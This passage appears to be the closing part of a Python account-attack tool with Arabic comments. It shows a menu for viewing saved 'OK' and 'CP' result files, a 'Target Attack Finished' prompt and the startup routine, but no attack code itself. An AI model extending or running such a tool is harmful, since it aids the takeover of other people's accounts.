    input(f"\n{G} [>] {W}Target Attack Finished. Press Enter...")
    main_menu()
# --- [ 11. FINAL BOOTSTRAP - نقطة الانطلاق والتشغيل ] ---

def results_menu():
    """عرض النتائج المحفوظة داخل الأداة"""
    logo()
    print(f"{G} [1] {W}View OK Results (Success)")
    print(f"{G} [2] {W}View CP Results (Checkpoints)")
    print(f"{G} [0] {W}Back")
    res_ch = input(f"\n{G} [?] {W}Choice: ")
    
    if res_ch == '1':
        os.system('cat OK.txt' if os.name != 'nt' else 'type OK.txt')
    elif res_ch == '2':
        os.system('cat CP.txt' if os.name != 'nt' else 'type CP.txt')
    
    input(f"\n{G} [>] {W}Press Enter...")
    main_menu()

if __name__ == "__main__":
    """بدء تشغيل النظام الفعلي"""
    try:
        # البدء بنظام الأمان أولاً
        check_security()
        # الدخول للقائمة الرئيسية
        main_menu()
    except KeyboardInterrupt:
        # الخروج الآمن عند الضغط على Ctrl + C
        print(f"\n{R} [!] {W}Tool Stopped by User.")
        sys.exit()
    except Exception as e:
        # في حال حدوث خطأ غير متوقع
        print(f"\n{R} [!] {W}System Error: {e}")
        time.sleep(3)
        main_menu()
